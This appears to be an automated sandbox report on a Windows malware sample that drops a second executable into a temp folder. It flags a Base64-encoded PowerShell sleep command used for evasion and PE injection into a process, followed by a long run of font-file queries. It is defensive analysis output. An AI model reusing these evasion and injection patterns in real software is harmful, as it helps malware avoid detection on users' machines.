Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C518494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00007FF64C518494

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process created: Base64 decoded start-sleep -seconds 38
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process created: Base64 decoded start-sleep -seconds 38			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Memory written: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe			Jump to behavior

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C5112EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,

0_2_00007FF64C5112EC

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
